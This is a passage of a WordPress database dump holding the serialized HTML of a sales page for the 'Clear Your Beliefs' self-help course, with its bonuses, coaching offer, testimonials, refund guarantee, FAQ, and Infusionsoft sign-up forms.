focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><FONT COLOR="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1632, 2059, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1461:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1672:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong>\nfor iPhone &#038; iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style=""><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1438:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script 